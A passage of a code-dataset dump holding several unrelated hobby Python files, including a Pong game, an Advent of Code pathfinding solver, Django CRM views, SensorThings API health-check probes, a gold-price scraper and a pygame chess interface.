in range(1, args.duration, args.interval):\n resp = product.request_forecast(forecast_time, forecast_hour, args)\n if resp.status_code != 200:\n sys.exit('HTTP response code {}'.format(resp.status_code))\n file.write(resp.content)\n time.sleep(args.sleep / 1000.0)\n logging.info('Wrote %s', filepath)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jodysankey/scripts","sub_path":"nws_grib.py","file_name":"nws_grib.py","file_ext":"py","file_size_in_byte":10589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1648046601","text":"from os.path import join, abspath, pardir, dirname\nfrom sys import path\nparent_dir = abspath(join(dirname(abspath(__file__)), pardir))\npath.append(parent_dir)\nfrom common.utils import *\n\ndef get_parent(par_dir):\n prefix = join(abspath(join(parent_dir, pardir)), \"data\") \n path = join(prefix, \"events\", par_dir)\n create_if_not_exists(path)\n return path\n","repo_name":"mohammadzainabbas/BDM","sub_path":"src/collectors/event/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39542953544","text":"import pygame, sys\r\nfrom pygame.locals import *\r\nimport math, random\r\n# Sets the colors that are used later for the triangles\r\nRED = (255, 0, 0)\r\nBLUE = (0,0,255)\r\nDARKRED = (192,0,0)\r\nGREEN = (0, 150, 0)\r\nBLACK = (0, 0, 0)\r\nYELLOW = (255, 215, 0)\r\nWHITE = (255, 255, 255)\r\nORANGE = (255,165,0)\r\nPURPLE = (128,0,128)\r\nTEAL = (86,237,253)\r\n\r\nhSize = 600\r\nvSize = 400\r\n\r\n# Initiates the window size for pygame\r\nWINDOW = pygame.display.set_mode((hSize, vSize), 0, 32)\r\ndef myDrawing(x,y,dx5,dy5):\r\n # Change x and y to move but we need to pass them back out\r\n x += dx5\r\n y += dy5\r\n\r\n boundingRect = pygame.Rect(x, y, 
hSize // 25, vSize // 20)\r\n pygame.draw.rect(WINDOW,WHITE,boundingRect)\r\n return boundingRect,x,y\r\n# Control Moving\r\nrectSize = 20\r\nmyRect = pygame.Rect(hSize//1.08,vSize//2,rectSize,vSize//4) #RED\r\nmyRect2 = pygame.Rect(hSize//30,vSize//2,rectSize,vSize//4) #BLUE\r\ndx,dy = 0,0\r\ndx2,dy2 = 0,0\r\nspeed = 10\r\n\r\ndef main():\r\n # Sets the caption for the window\r\n pygame.display.set_caption(\"Our first moving shapes\")\r\n # Initiates PyGame\r\n pygame.init()\r\n score1 = -1\r\n score2 = -1\r\n x = hSize//2\r\n y = vSize//3\r\n dx5 = 4\r\n dy5 = 2\r\n # Set up a clock\r\n timer = pygame.time.Clock()\r\n pygame.key.set_repeat(100, 50)\r\n while True:\r\n timer.tick(60)\r\n dx, dy, dx2, dy2 = 0, 0, 0, 0\r\n for event in pygame.event.get():\r\n keys = pygame.key.get_pressed()\r\n # if keys[pygame.K_LEFT]:\r\n # dx = -speed\r\n # elif keys[pygame.K_RIGHT]:\r\n # dx = speed\r\n if keys[pygame.K_UP]:\r\n dy = -speed\r\n elif keys[pygame.K_DOWN]:\r\n dy = speed\r\n if keys[pygame.K_w]:\r\n dy2 = -speed\r\n elif keys[pygame.K_s]:\r\n dy2 = speed\r\n # if keys[pygame.K_a]:\r\n # dx2 = -speed\r\n # elif keys[pygame.K_d]:\r\n # dx2 = speed\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if myRect.left < 0:\r\n myRect.left, dx = 0, 0\r\n elif myRect.right > hSize:\r\n myRect.right, dx = hSize, 0\r\n if myRect.top < 0:\r\n myRect.top, dy = 0, 0\r\n elif myRect.bottom > vSize:\r\n myRect.bottom, dy = vSize, 0\r\n if myRect2.left < 0:\r\n myRect2.left, dx2 = 0, 0\r\n elif myRect2.right > hSize:\r\n myRect2.right, dx2 = hSize, 0\r\n if myRect2.top < 0:\r\n myRect2.top, dy2 = 0, 0\r\n elif myRect2.bottom > vSize:\r\n myRect2.bottom, dy2 = vSize, 0\r\n\r\n myRect.move_ip(dx, dy) # Move the rectangle\r\n myRect2.move_ip(dx2, dy2) # Move the rectangle\r\n WINDOW.fill(RED)\r\n # Drawing rectangles\r\n backOne = pygame.Rect(hSize // 2, vSize//1000, hSize, vSize)\r\n pygame.draw.rect(WINDOW, BLUE, backOne)\r\n # Fill the screen with a color\r\n # Updates the screen\r\n boundingRect,x,y = myDrawing(x,y,dx5,dy5)\r\n if boundingRect.top<=0 or boundingRect.bottom>=vSize:\r\n dy5*=-1\r\n if boundingRect.left<=0:\r\n x= hSize//2\r\n y= vSize//2\r\n score1+=1\r\n if boundingRect.right>=hSize:\r\n x = hSize // 2\r\n y = vSize // 2\r\n score2+=1\r\n\r\n if myRect.colliderect(boundingRect):\r\n dx5*=-1\r\n dy5*=1\r\n elif myRect2.colliderect(boundingRect):\r\n dx5*=-1\r\n dy5*=1\r\n else:\r\n pygame.draw.rect(WINDOW, RED, myRect) # Draw the rectangle\r\n pygame.draw.rect(WINDOW, BLUE, myRect2) # Draw the rectangle\r\n\r\n # Text\r\n myfont = pygame.font.SysFont('Comic Sans MS', 30)\r\n textsurface = myfont.render(str(score1), False, (0, 0, 0))\r\n textsurface2 = myfont.render(str(score2), False, (0, 0, 0))\r\n WINDOW.blit(textsurface, (hSize//3.35, 0))\r\n WINDOW.blit(textsurface2, (hSize // 1.5, 0))\r\n\r\n # Rules and Instructions\r\n if score1 == -1:\r\n dx5, dy5 = 0, 0\r\n WINDOW.fill(BLUE)\r\n textsurface6 = myfont.render(\"Game: Classic Pong\", False, BLACK)\r\n WINDOW.blit(textsurface6, (hSize // 3.5, vSize // 12))\r\n textsurface3 = myfont.render(\"RULES: Use your paddle to hit the ball to\", False, TEAL)\r\n WINDOW.blit(textsurface3, (hSize // 50, vSize // 4))\r\n textsurface5 = myfont.render(\"the other players side of the screen.\", False, TEAL)\r\n WINDOW.blit(textsurface5, (hSize // 50, vSize // 3))\r\n textsurface7 = myfont.render(\"Player 1: Use w and s to move up and down.\", False, BLACK)\r\n WINDOW.blit(textsurface7, (hSize // 50, vSize // 2.2))\r\n textsurface8 = 
myfont.render(\"Player 2: Use arrows to move up and down.\", False, BLACK)\r\n WINDOW.blit(textsurface8, (hSize // 50, vSize // 1.8))\r\n textsurface8 = myfont.render(\"FIRST PLAYER TO 10 POINTS WINS!!!\", False, TEAL)\r\n WINDOW.blit(textsurface8, (hSize // 50, vSize // 1.4))\r\n textsurface4 = myfont.render(\"Press Backspace to play!!\", False, RED)\r\n WINDOW.blit(textsurface4, (hSize // 5, vSize // 1.2))\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_BACKSPACE]:\r\n score1, score2 = 0, 0\r\n dx5, dy5 = 4, 2\r\n\r\n # Wins and loses\r\n if score1 == 10:\r\n dx5,dy5 =0,0\r\n WINDOW.fill(BLUE)\r\n textsurface3 = myfont.render(\"Player Two Wins\", False, RED)\r\n WINDOW.blit(textsurface3, (hSize//3, vSize//4))\r\n textsurface4 = myfont.render(\"Press Backspace to play again\", False, RED)\r\n WINDOW.blit(textsurface4, (hSize // 5, vSize // 2))\r\n if keys[pygame.K_BACKSPACE]:\r\n score1,score2=0,0\r\n dx5,dy5=4,2\r\n if score2 == 10:\r\n dx5,dy5=0,0\r\n WINDOW.fill(RED)\r\n textsurface3 = myfont.render(\"Player One Wins\", False, BLUE)\r\n WINDOW.blit(textsurface3, (hSize//3, vSize//4))\r\n textsurface4 = myfont.render(\"Press Backspace to play again\", False, BLUE)\r\n WINDOW.blit(textsurface4, (hSize // 5, vSize // 2))\r\n if keys[pygame.K_BACKSPACE]:\r\n score1,score2=0,0\r\n dx5,dy5=4,2\r\n pygame.display.update()\r\n\r\nmain()","repo_name":"KeeanBenjamin/PingPong","sub_path":"PongGame.py","file_name":"PongGame.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23098348771","text":"import heapq\nfrom itertools import product\n\n\ndef show(risk, tx, ty):\n\n for j in range(ty+2):\n row = []\n for i in range(tx+2):\n s = {0: '.', 1: '=', 2: '|'}\n if (i, j) == (0, 0):\n row.append('M')\n elif (i, j) == (tx, ty):\n row.append('T')\n else:\n row.append(s[risk[(i, j)]])\n print(''.join(row))\n\n\ndef build_cave(depth, tx, ty):\n\n geologic = {}\n erosion = {}\n\n EXTRA_SIZE = 100\n\n for i in range(tx + EXTRA_SIZE):\n geologic[(i, 0)] = i * 16807\n erosion[(i, 0)] = (geologic[(i, 0)] + depth) % 20183\n\n for j in range(ty + EXTRA_SIZE):\n geologic[(0, j)] = j * 48271\n erosion[(0, j)] = (geologic[(0, j)] + depth) % 20183\n\n for i, j in product(range(1, tx+EXTRA_SIZE), range(1, ty+EXTRA_SIZE)):\n geologic[(i, j)] = erosion[(i-1, j)] * erosion[(i, j-1)]\n erosion[(i, j)] = (geologic[(i, j)] + depth) % 20183\n\n geologic[(0, 0)] = 0\n geologic[(tx, ty)] = 0\n erosion[(0, 0)] = 0\n erosion[(tx, ty)] = 0\n\n risk = {k: v % 3 for k, v in erosion.items()}\n\n return risk\n\n\nclass AStar:\n\n def __init__(self, cave, target):\n\n self.target = target\n self.graph = cave\n\n self.max_x = max(x[0] for x in cave)\n self.max_y = max(x[1] for x in cave)\n\n self.best_cost = {((0, 0), 'torch'): 0}\n self.neighbors = [(0, ((0, 0), 'torch'))]\n self.visited = set()\n\n def search(self):\n\n while self.neighbors:\n\n t, next_node = heapq.heappop(self.neighbors)\n if t >= self.best_cost.get(self.target, 9E99):\n break\n if next_node in self.visited:\n continue\n self._visit_node(next_node)\n\n return self.best_cost[self.target]\n\n def _visit_node(self, node):\n\n self.visited.add(node)\n\n (nx, ny), tool = node\n\n # neighbors by walking\n for _x, _y in [(-1, 0), (1, 0), (0, 1), (0, -1)]:\n x = nx + _x\n y = ny + _y\n\n if any([(x < 0), (y < 0), (x >= self.max_x), (y >= self.max_y)]):\n continue\n\n # right tool for da job?\n risk = self.graph[(x, y)]\n\n if tool == 'none' and risk == 0:\n 
continue\n if tool == 'torch' and risk == 1:\n continue\n if tool == 'climbing' and risk == 2:\n continue\n\n g = self.best_cost[node] + 1\n h = self._heuristic(x, y)\n t = g + h\n\n self.best_cost[((x, y), tool)] = min(g, self.best_cost.get(((x, y), tool), 9E99))\n\n state = ((x, y), tool)\n if state not in self.visited:\n new_node = (t, state)\n heapq.heappush(self.neighbors, new_node)\n\n # neighbors by switching tool\n risk = self.graph[(nx, ny)]\n for new_tool in ['none', 'torch', 'climbing']:\n\n if new_tool == tool:\n continue\n if new_tool == 'none' and risk == 0:\n continue\n if new_tool == 'torch' and risk == 1:\n continue\n if new_tool == 'climbing' and risk == 2:\n continue\n\n g = self.best_cost[node] + 7\n h = self._heuristic(x, y)\n t = g + h\n\n self.best_cost[((nx, ny), new_tool)] = min(g, self.best_cost.get(((nx, ny), new_tool), 9E99))\n\n state = ((nx, ny), new_tool)\n if state not in self.visited:\n new_node = (t, state)\n heapq.heappush(self.neighbors, new_node)\n\n def _heuristic(self, x, y):\n return self.max_x - x + self.max_y - y\n\n\ndef solve(depth, tx, ty):\n\n cave = build_cave(depth, tx, ty)\n\n target = ((tx, ty), 'torch')\n a = AStar(cave, target)\n solution = a.search()\n\n show(cave, tx, ty)\n return solution\n\n\ndef main():\n\n with open(\"input\") as in_f:\n d = int(in_f.readline().strip().split()[-1])\n tx, ty = map(int, in_f.readline().strip().split()[-1].split(','))\n\n solution = solve(d, tx, ty)\n\n print(solution)\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"carrdelling/AdventOfCode2018","sub_path":"p22/gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31428366722","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom .models import Lead, Agent, User\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import LeadSerializer, LeadSerializerAll\nfrom django.db.models import Q\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAdminUser, IsAuthenticated\n\n\n\n\nclass LeadView(APIView):\n \n\n def get(self, request):\n \n queryset = Lead.objects.filter(\n Q(claimed=None)\n or Q(claimed=\"\")\n ).all()\n serialized = LeadSerializer(queryset, many=True)\n\n return Response(\n serialized.data,\n status=status.HTTP_302_FOUND\n )\n\n def post(self, request):\n \n try:\n data = LeadSerializer(data=request.data)\n except Exception as err:\n return Response(\n {\n \"error\": str(err)\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n\n if data.is_valid():\n data.save()\n return Response(\n data.data,\n status=status.HTTP_201_CREATED\n )\n else:\n return Response(\n {\n \"error\": str(data.errors)\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n\n\nclass AgentView(APIView):\n \n authentication_classes = [SessionAuthentication, BasicAuthentication]\n permission_classes = [IsAuthenticated]\n\n def get(self, request, id):\n \n agent = Agent.objects.filter(user=request.user).first()\n try:\n lead = Lead.objects.filter(\n (Q(claimed=None) or Q(claimed=agent)) and Q(id=id)).first()\n lead_serialized = LeadSerializerAll(lead)\n except Lead.DoesNotExist:\n return Response(\n {\n \"error\": \"Lead claimed.\"\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n return Response(\n lead_serialized.data,\n status=status.HTTP_202_ACCEPTED\n )\n\n def post(self, request, id: 
int):\n \n agent = Agent.objects.filter(user=request.user).first()\n try:\n lead = Lead.objects.get(pk=id)\n except Lead.DoesNotExist:\n return Response(\n {\n \"error\": \"The lead does not exist.\"\n },\n status=status.HTTP_204_NO_CONTENT\n )\n if not lead.claimed:\n lead.claime = agent\n lead.save()\n serialized = LeadSerializerAll(lead)\n\n return Response(\n serialized.data,\n status=status.HTTP_202_ACCEPTED\n )\n elif lead.claimed != agent:\n return Response(\n {\n \"error\": \"Lead claimed.\"\n },\n status=status.HTTP_306_RESERVED\n )\n elif lead.claimed == agent:\n return Response(\n {\n \"error\": \"This has been claimed already.\"\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n","repo_name":"Rads059/CRM","sub_path":"form/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38862439959","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport argparse\nimport pickle\n\nimport _init_paths\n# sys.path.append(\"/home/josep/code/python/rlcode/robovat\")\nfrom obs_handler import ObservationHandler\n\n\nclass SampleVisualizer(object):\n\n def __init__(self, samples_dir):\n if not os.path.exists(samples_dir):\n print(\"Sample directory does not exist.\")\n exit(-1)\n elif not os.path.isdir(samples_dir):\n print(samples_dir + \" is not a directory.\")\n exit(-1)\n\n dirs = [samples_dir + '/' + _ for _ in os.listdir(samples_dir)]\n self.files = []\n for d in dirs:\n self.files.extend([d + '/' + _ for _ in os.listdir(d)])\n\n self.show_idx = 0\n self.plotter = ObservationHandler()\n\n def show_next(self):\n with open(self.files[self.show_idx], 'rb') as f:\n data = pickle.load(f)\n observation, pick_place = data[0], data[1]\n grasp = pick_place[0]\n self.plotter.plot([observation['depth'],\n observation['rgb'],\n observation['segmask']],\n grasp\n )\n self.plotter.show()\n self.show_idx += 1\n f.close()\n\n def show_all(self):\n while self.show_idx < len(self.files):\n self.show_next()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--sample_dir\", type=str, help=\"Directory of samples.\")\n args = parser.parse_args()\n\n v = SampleVisualizer(args.sample_dir)\n v.show_all()\n","repo_name":"JosepLeder/CLKRobovat","sub_path":"tools/sample_visualizer.py","file_name":"sample_visualizer.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"42301677661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 27 20:02:18 2018\n\n@author: Santosh Bag\n\"\"\"\n\nimport sys\nimport requests\nimport datetime #import date, timedelta\nfrom pandas import DataFrame\nfrom bs4 import BeautifulSoup\n\nimport mrigutilities\n\ndef gold_download():\n print(\"Gold Rates download started\", end =\" \")\n engine = mrigutilities.sql_engine()\n \n url = 'https://www.gold.org/data/gold-price'\n \n s = requests.Session()\n response = s.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n \n today = datetime.date.today()\n \n price_table = soup.find_all(class_='mid')\n \n #price = price_table[0].find_all(class_='value')[0].text.replace(\",\",\"\")\n price = price_table[0].text.replace(\",\",\"\")\n date = soup.find_all(class_='timestamp')[0].text.split(\",\")[0]\n date = datetime.datetime.strptime(date,'%d %B %Y').date()\n #print(price)\n 
#print(date)\n sql = \"INSERT INTO gold_prices (value_date, price, download_date) VALUES ( '\"\\\n +date.strftime('%Y-%m-%d')+\"','\"\\\n +price+\"','\"\\\n +today.strftime('%Y-%m-%d')+\"')\"\n engine.execute(sql)\n print(\"Gold Rates download finished\\n\")\n \nif __name__ == '__main__':\n gold_download()","repo_name":"santoshbag/mrigAnalytics","sub_path":"old/goldprice.py","file_name":"goldprice.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3553333318","text":"import sys\r\nsys.path.append(\"..\")\r\nfrom Motor.Juego import *\r\nfrom Interfaz import Opciones\r\nfrom Interfaz import Archivos\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\n\r\ndef borrarEventos():\r\n pygame.event.set_blocked(pygame.ACTIVEEVENT)\r\n pygame.event.set_blocked(pygame.KEYDOWN)\r\n pygame.event.set_blocked(pygame.KEYUP)\r\n pygame.event.set_blocked(pygame.MOUSEMOTION)\r\n pygame.event.set_blocked(pygame.MOUSEBUTTONUP)\r\n #pygame.event.set_blocked(pygame.MOUSEBUTTONDOWN)\r\n pygame.event.set_blocked(pygame.JOYAXISMOTION)\r\n pygame.event.set_blocked(pygame.JOYBALLMOTION)\r\n pygame.event.set_blocked(pygame.JOYHATMOTION)\r\n pygame.event.set_blocked(pygame.JOYBUTTONUP)\r\n pygame.event.set_blocked(pygame.JOYBUTTONDOWN)\r\n pygame.event.set_blocked(pygame.VIDEORESIZE)\r\n pygame.event.set_blocked(pygame.VIDEOEXPOSE)\r\n pygame.event.set_blocked(pygame.USEREVENT)\r\n\r\n\r\ndef dibujarPantalla(juego, screen):\r\n\r\n screen.blit(juego.fondoPantalla, (0, 0))\r\n\r\n for fila in juego.tablero.casillas:\r\n for casilla in fila:\r\n if not (casilla.fila == 0 or casilla.columna == 0):\r\n screen.blit(casilla.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casilla.fila)))\r\n #Dibujado de la pieza que ocupa la casilla\r\n if casilla.pieza is not None:\r\n if casilla.pieza.activo:\r\n screen.blit(casilla.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casilla.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef dibujarMovimiento(juego, screen, jugada):\r\n\r\n #Casilla Origen\r\n casillaOr = juego.tablero.casillas[jugada[0][0]][jugada[0][1]]\r\n #CasillaDestino\r\n casillaDes = juego.tablero.casillas[jugada[1][0]][jugada[1][1]]\r\n\r\n for paso in range(0,Opciones.TamanoCuadro + 1,1):\r\n\r\n pygame.time.wait(5)\r\n\r\n for fila in juego.tablero.casillas:\r\n for casilla in fila:\r\n if not (casilla.fila == 0 or casilla.columna == 0):\r\n screen.blit(casilla.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casilla.fila)))\r\n # Dibujado de la piezas fijas que ocupan las casillas\r\n if casilla.pieza is not None:\r\n if casilla.pieza.activo:\r\n if not casilla.pieza == casillaDes.pieza:\r\n screen.blit(casilla.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casilla.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casilla.fila)))\r\n\r\n screen.blit(casillaDes.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casillaOr.columna - 1) + paso * (casillaDes.columna - casillaOr.columna),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casillaOr.fila) + paso * (casillaOr.fila - casillaDes.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef 
dibujarSeleccion(casillaPresionada,juego,screen):\r\n\r\n CasillaPresionada = juego.tablero.casillas[casillaPresionada[0]] \\\r\n [casillaPresionada[1]]\r\n\r\n screen.blit(CasillaPresionada.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaPresionada.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaPresionada.fila)))\r\n\r\n if CasillaPresionada.pieza is not None:\r\n if CasillaPresionada.pieza.activo:\r\n screen.blit(CasillaPresionada.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaPresionada.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaPresionada.fila)))\r\n\r\n screen.blit(juego.seleccion, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaPresionada.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaPresionada.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef dibujarJugada(movimientos, juego, screen):\r\n\r\n for movimiento in movimientos:\r\n\r\n CasillaValida = juego.tablero.casillas[movimiento[0]] \\\r\n [movimiento[1]]\r\n\r\n screen.blit(CasillaValida.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaValida.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaValida.fila)))\r\n\r\n if CasillaValida.pieza is not None:\r\n if CasillaValida.pieza.activo:\r\n screen.blit(CasillaValida.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaValida.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaValida.fila)))\r\n\r\n screen.blit(juego.jugadasValidas, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaValida.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaValida.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef recibirJugada(juego,screen):\r\n\r\n jugadaValida = False\r\n\r\n while not jugadaValida:\r\n\r\n piezaSeleccionada = None\r\n\r\n seleccionValida = False\r\n\r\n event = pygame.event.wait()\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n posicion = event.pos\r\n\r\n #Casillas de acuerdo al ajedrez\r\n casillaPresionada = [\r\n (8 - (posicion[1] - Opciones.SangriaSup) // Opciones.TamanoCuadro),\r\n ((posicion[0] - Opciones.SangriaIzq) // Opciones.TamanoCuadro) + 1\r\n ]\r\n\r\n if casillaPresionada[0] in range(1,9) and casillaPresionada[0] in range(1,9):\r\n\r\n if juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza is None:\r\n continue\r\n if not juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza.activo:\r\n continue\r\n if not juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza.color == \\\r\n juego.jugadores[juego.turno % 2].color:\r\n continue\r\n\r\n piezaSeleccionada = juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza\r\n\r\n dibujarSeleccion(casillaPresionada,juego,screen)\r\n\r\n else:\r\n continue\r\n\r\n #Dibujado de las opciones por jugar\r\n dibujarJugada(piezaSeleccionada.movimientosDisponibles,juego,screen)\r\n\r\n #Espera la casilla de destino\r\n anotherEvent = pygame.event.wait()\r\n\r\n if anotherEvent.type == pygame.QUIT:\r\n sys.exit()\r\n elif anotherEvent.type == pygame.MOUSEBUTTONDOWN:\r\n nuevaPosicion = anotherEvent.pos\r\n\r\n # Casillas de acuerdo al ajedrez\r\n nuevaCasillaPresionada = [\r\n (8 - (nuevaPosicion[1] - Opciones.SangriaSup) // Opciones.TamanoCuadro),\r\n ((nuevaPosicion[0] - Opciones.SangriaIzq) // Opciones.TamanoCuadro) + 1\r\n 
]\r\n\r\n if nuevaCasillaPresionada in piezaSeleccionada.movimientosDisponibles:\r\n\r\n jugadaValida = True\r\n\r\n #Redibujado\r\n dibujarPantalla(juego,screen)\r\n\r\n return [casillaPresionada, nuevaCasillaPresionada]\r\n\r\n\r\ndef main():\r\n\r\n pygame.init()\r\n\r\n borrarEventos()\r\n\r\n screen = pygame.display.set_mode((Opciones.AnchoPantalla, Opciones.AltoPantalla))\r\n pygame.display.set_caption(\"Automatic Chess\")\r\n\r\n juego = Juego()\r\n\r\n dibujarPantalla(juego, screen)\r\n\r\n terminar = False\r\n\r\n while True:\r\n\r\n juego.iniciarTurno()\r\n\r\n if juego.jugadores[juego.turno % 2].movimientosDisponibles == 0:\r\n break\r\n\r\n jugada = recibirJugada(juego,screen)\r\n\r\n juego.desarrollarTurno(jugada)\r\n\r\n dibujarMovimiento(juego, screen, jugada)\r\n\r\n terminar = juego.terminarTurno()\r\n\r\n dibujarPantalla(juego, screen)\r\n\r\n\r\n if terminar:\r\n if (juego.turno % 2) == ((1 - Opciones.JugadorColor) // 2):\r\n print(\"Jugador Negro ganó\")\r\n else:\r\n print(\"Jugador Blanco ganó\")\r\n else:\r\n print(\"Empate\")\r\n \r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"vick08bv/Ajedrez","sub_path":"Ajedrez/Interfaz/InterfazJuego.py","file_name":"InterfazJuego.py","file_ext":"py","file_size_in_byte":8613,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37447018518","text":"from GeoHealthCheck.probe import Probe\n\n\nclass StaCaps(Probe):\n \"\"\"Probe for SensorThings API main endpoint url\"\"\"\n\n NAME = 'STA Capabilities'\n DESCRIPTION = 'Perform STA Capabilities Operation and check validity'\n RESOURCE_TYPE = 'OGC:STA'\n\n REQUEST_METHOD = 'GET'\n\n def __init__(self):\n Probe.__init__(self)\n\n CHECKS_AVAIL = {\n 'GeoHealthCheck.plugins.check.checks.HttpStatusNoError': {\n 'default': True\n },\n 'GeoHealthCheck.plugins.check.checks.JsonParse': {\n 'default': True\n },\n 'GeoHealthCheck.plugins.check.checks.ContainsStrings': {\n 'default': True,\n 'set_params': {\n 'strings': {\n 'name': 'Must contain STA Entity names',\n 'value': ['Things', 'Datastreams', 'Observations',\n 'FeaturesOfInterest', 'Locations']\n }\n }\n },\n }\n \"\"\"\n Checks avail for all specific Caps checks.\n Optionally override Check.PARAM_DEFS using set_params\n e.g. with specific `value` or even `name`.\n \"\"\"\n\n\nclass StaGetEntities(Probe):\n \"\"\"Fetch STA entities of type and check result\"\"\"\n\n NAME = 'STA GetEntities'\n DESCRIPTION = 'Fetch all STA Entities of given type'\n RESOURCE_TYPE = 'OGC:STA'\n\n REQUEST_METHOD = 'GET'\n\n # e.g. 
http://52.26.56.239:8080/OGCSensorThings/v1.0/Things\n REQUEST_TEMPLATE = '/{entities}'\n\n def __init__(self):\n Probe.__init__(self)\n\n PARAM_DEFS = {\n 'entities': {\n 'type': 'string',\n 'description': 'The STA Entity collection type',\n 'default': 'Things',\n 'required': True,\n 'range': ['Things', 'DataStreams', 'Observations',\n 'Locations', 'Sensors', 'FeaturesOfInterest',\n 'ObservedProperties', 'HistoricalLocations']\n }\n }\n \"\"\"Param defs\"\"\"\n\n CHECKS_AVAIL = {\n 'GeoHealthCheck.plugins.check.checks.HttpStatusNoError': {\n 'default': True\n },\n 'GeoHealthCheck.plugins.check.checks.JsonParse': {\n 'default': True\n }\n }\n \"\"\"Check for STA Get entity Collection\"\"\"\n","repo_name":"geopython/GeoHealthCheck","sub_path":"GeoHealthCheck/plugins/probe/sta.py","file_name":"sta.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"} +{"seq_id":"29675030236","text":"#!/usr/bin/env python3\nfrom os import path\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.patches import Patch\n\nfrom utils.context import data_processed_dir, plot_dir\nfrom utils.utils import plot_handler, colorlist20, remove_nan\n\n# comment out these lines if latex not installed\nplt.rc('font', family='sans-serif', serif='cm10')\nplt.rc('text', usetex=True)\n\n\ndef check_if_range_lies(col, interval_list):\n for i, interval_set in enumerate(interval_list):\n if interval_set[0] <= col <= interval_set[1]:\n return i + 1\n return np.nan\n\n\n## Config\nSHOW_PLOT_FLAG = False\nDATA_FOLDER = path.join(data_processed_dir, 'figure7-nsa_modes')\nCOMBINED_FILE = path.join(DATA_FOLDER, \"TCP-EXPERIMENTS.csv\")\nHO_INTERVAL_START = 100 # in ms\nHO_INTERVAL_END = 1000\n\n## read data\nbbr_df = pd.read_csv(COMBINED_FILE, low_memory=False)\n\nbbr_lte_df = bbr_df[bbr_df['mode'] == 'lte_mode'].copy(deep=True)\nbbr_dual_df = bbr_df[bbr_df['mode'] == 